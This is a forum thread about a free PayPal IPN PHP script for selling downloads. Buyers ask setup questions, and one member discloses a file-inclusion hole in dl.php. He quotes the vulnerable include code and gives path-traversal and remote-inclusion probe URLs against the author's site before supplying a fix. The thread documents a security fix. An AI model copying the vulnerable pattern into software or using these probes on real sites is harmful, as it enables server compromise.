kidino

Okay, this may sound like a shameless plug. But I am giving away my Paypal IPN PHP script if you are selling ebooks, files, etc... anything downloadable.

I spent about the last week tweaking the script, writing docs, etc... and now you can get it for free. Just download it from my website:

Simple IPN: Free Paypal IPN PHP Script for Digital Download Products -- MiniSiteGallery.com

Feedbacks, comments, help... we can discuss it here or you can add comments to my blog.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Steve Diamond

Great gift! Thanks very much!

A couple of questions:

1) On your site you say
Does that include rewriting, rebranding and reselling it?

2) I see in settings.php where it says:
I interpret that to mean that the actual files for download can reside outside of (above) the public_html folder, meaning that they don't have URLs and can't be accessed except through a verified download link. Is that correct? (If so, great! That's way more secure than 90% of so-called download protection schemes.)

Thanks.

Steve

Executive I.T. consulting for small/medium business
Website development | PHP - MySQL - JavaScript expert programming
Software requirements analysis | Specification writing
Project management | Vendor relationship management

HomeBizNizz

Thanks....

James Blair

Awesome script, it's pretty cool that you're giving it away. I just downloaded it and will try it out soon!

bhackett

Wow...thanks for the great script. I'll let you know how it works.

kidino

Hmm... the lazy part of me says, "Just don't care - do what you want"

The greedy part of me, "Send me something back -- how about a royalty"

Hmm ... how about this? If you get the $10 version - do what you want. If you feel generous, send some back when you make a substantial amount.

Yep, that is right. As long as the script can find the source file from its location, you can put it there.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

kidino

Looking forward to it. Please do share.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

kidino

Looking forward to your experience. Please do share. Need some testimonials at this point to get more people using it.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

kidino

Good for you!

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Steve Diamond

Kidino, here's what I think. If I do get to that point I'll set you up as an affiliate with a JV-level commission. I'm not contemplating a high price tag, so don't get too excited about the possibilities. But I certainly think you deserve a cut.

Thanks!

Steve

Executive I.T. consulting for small/medium business
Website development | PHP - MySQL - JavaScript expert programming
Software requirements analysis | Specification writing
Project management | Vendor relationship management

Damien Roche

This is very kind of you Kidino. If it's quality stuff, I'll definitely purchase the raw source code.

Damien Roche

What was I thinking! This is very good quality scripting. I'll be in touch

ASUService

Thanks Much!!!! I sent the $10 even tho' I'm not sure I'll remove the branding. The script is worth so much more than that!!!!

Good luck getting it out there.

Best Regards,
Mike Allton
ASU Service, Inc.
GoMobile Customer Contact Text/SMS System! White Label Dev License Included!!

kidino

Thanks for the support guys. Anybody got a working example yet??

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

kidino

The zero-branding version has no ad credit in there... I am thinking of a re-coding it with an on-off variable option.

$show_ad_credit = 0; // turn off/on ad credit - 1 = on, 0 = off

Yeah, I think that's better ...


KIDINO

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Tim Franklin

Nice product, just sent you a paypal, thanks

|Software Distribution | SEO Website Flipping |

dwaser

Great script, thanks a lot. Just sent you the $10.

kidino

thanks for the paypal money guys...

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

saschakimmel

Thanks for sharing, I'll check it more thoroughly later.
I just stumbled upon this:

in functions.php:
$download_list .= '<script type="text/javascript" src="http://790530055279.com/simpleipn.php"></script>';

Is there any reason in downloading this JavaScript file from *your server* on every display of the product list?

And this looks like a security problem to me:

in dl.php:
$txn_id = $_GET['id'];
if (file_exists($txn_id.'.php'))
{ include($txn_id.'.php'); }

This means that I could execute every PHP file I like on your server by giving a simple relative path like dl.php?id=../../admin/deleteusers (if that would exist).
Using basename() would help.

** Get my ViralListMachine software now for free and build your own list virally by giving away free stuff @ http://www.virallistmachinegiveaway.com **

Steve Wells

Tweak the code and make it more secure then make comments in the code where you changed things and send me a copy........please.

Tim Franklin

sounds interesting, I would be interested in hearing the end of the story on that last as well.

|Software Distribution | SEO Website Flipping |

kidino

in functions.php:
$download_list .= '<script type="text/javascript" src="http://790530055279.com/simpleipn.php"></script>';

Owh, that's the floating credit for the script.

Is there any reason in downloading this JavaScript file from *your server* on every display of the product list?

in dl.php:
$txn_id = $_GET['id'];
if (file_exists($txn_id.'.php'))
{ include($txn_id.'.php'); }

Meant to change that. You could be right. But my test, can't get it to find in other folders. You can give it a try if it's different on your folder. Getting just basename is a lot safer...

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

CMartin

I alerted you via PM for this same problem in "08-23-2009" and the response I got was: "Thanks CMartin. Will update this."

I'm not using this script, and if I were, I would know what to change to make it safer. But you must realize there are other users using this script without the knowledge to detect and fix this security problem.

Carlos

Steve Wells

Kidino, when you make the security changes that have been requested to make this script secure let me know, I would love to try it out.....

saschakimmel

Just as a proof of concept that the inclusion still works on your own server:
http://www.minisitegallery.com/simpleipn/dl.php?id=ipn
-> includes http://www.minisitegallery.com/simpleipn/ipn.php (well, throws an error but I now know your username on your server, see for yourself)

http://www.minisitegallery.com/simpl...hp?id=../index
-> includes MiniSiteGallery.com Free Mini-Site Templates & Design (an error because something's included)

If inclusion via HTTP and fopen-wrappers would be active on your site (which luckily they are not in this case) I could execute my own PHP code on your server:
http://www.minisitegallery.com/simpl...w.tricos.com/t
-> would execute http://www.tricos.com/t.php (could be everything, currently just phpinfo()
This is called remote file inclusion.

Here is the fix:
in dl.php:
$ txn_id = basename($ _GET['id']);
or if the id only contains letters and numbers this is even safer:$ txn_id = preg_replace("/[^0-9a-zA-Z]/", "", $ _GET['id']);

Please remove the script from your website immediately or fix the code!
This can be used to "hack" a server very easily (if remote file inclusion is supported). So if somebody is currently using your script it's very easy to execute remote PHP files on your server however malicious they might be.
And no, I'm not a hacker and never was - ever.

Just look here for more about this security problem:
http://en.wikipedia.org/wiki/Code_in...file_injection

** Get my ViralListMachine software now for free and build your own list virally by giving away free stuff @ http://www.virallistmachinegiveaway.com **

kidino

Thanks for highlighting this. The script has been fixed.

To those who uses the script, please download the current version.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Steve Wells

Where is the link to download the corrected version?
On your site?

If so is it the original link we downloaded from that says [ DOWNLOAD SIMPLE IPN ]

Which files have been corrected or do we need to uplaod them all?

kidino

Yes, the source for the link has been replaced. So the old link would work. And the files that has been fixed are dl.php and page.php.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

FranklinF

sorry i have a newb question

i purchased the simpleipn script without the branding

if i wanted to update the script so it is secure
could i just upload and rewrite the new dl.php and page.php

and the script will be secure?

or is there more involved?

thanks
franklin

kidino

I am not really sure what you mean by secure. If you are referring to previous issues and you just downloaded recently, it's already been fixed. And you if you are still referring to previous issue, yes can upload and replace page.php and dl.php

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

FranklinF

my question was:

I had downloaded the script without branding ($10) some time ago.
From reading this thread there was a security issue with the script that has since been fixed.
To update the version of the script I am running I would just need to upload and overwrite only these two files:
page.php
dl.php

which I think you just answered as yes.

I have updated these too files

thanks for the great script
it is working well for me so far

Franklin

kidino

Franklin, PM sent.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Tim Franklin

Just a quick question, I have the simple IPN open, script, and I was looking at how I could serve a download from above public_html I would think using a path, like
home/user/downloads/file.zip

I was trying to figure out how I could make that work with the script, thanks for any suggestions, Tim

|Software Distribution | SEO Website Flipping |

kidino

Tim,

In settings.php, you need to specify where the source of the file is. You could put the path from the location of the script. Let's say that your web hosting structure is like this:

web root folder - /home/user/public_html
simple ipn folder - /home/user/public_html/ipn
your file folder - /home/user/my_files

You can specify the path to the file like this

source => "/home/user/my_files/download.zip",

or like this

source => "../../my_files/download.zip",

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

Tim Franklin

Hi, thanks, yes, that is how I thought it might work, thanks for saving me some time, I am working on creating multiple product support, but it is a challenge, so far, but I love a good challenge, thanks for the reply,

Tim

|Software Distribution | SEO Website Flipping |

kidino

I have been thinking about the multiple product support. Definitely can be done. But it will make things a bit complicated to set up, which could result in "not-so" Simple IPN.

Was thinking of implementing it by creating a separate products.php just for products. The the link would be "ipn.php?buy-x" where x is the product number. Would definitely have to modify ipn.php and other files.

Not really sure I will do this. But sure is a fun challenge. If I do this I will definitely update my page at minisitegallery.com

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

AlanCarr

I wasted an entire afternoon and much of my evening, trying to find a wordpress plugin that was worth using.

Did find one, at $40... but lately I'm sick of forking out for stuff, so kept sniffing. And ended up back on the WF lol

Just wanted something really short, sweet and simple, for a silly little ebook at $7.

This does the trick nicely, thanks

I do have one question though... which page/file do I tell PP to use for their IPN thingy?




AC

This man is living his dream. Are you...?
www.copywriter-ac.com

kidino

With SimpleIPN, you don't have to worry about where your IPN URL is, etc ... just edit the settings and link to ipn.php?buy -- that will create the Paypal Buy Button and automatically clicks on it so that users are redirected to Paypal.

The ipn.php?buy will take care of where your IPN URL should be and tells it to Paypal for you.

Sell ebook with Paypal - UPLOADnSELL.com - the fastest & easiest way to sell ebook, downloads or files. No fees, no registrations, no installations - just upload and sell, seriously!

liancloud

Pretty cool... thanks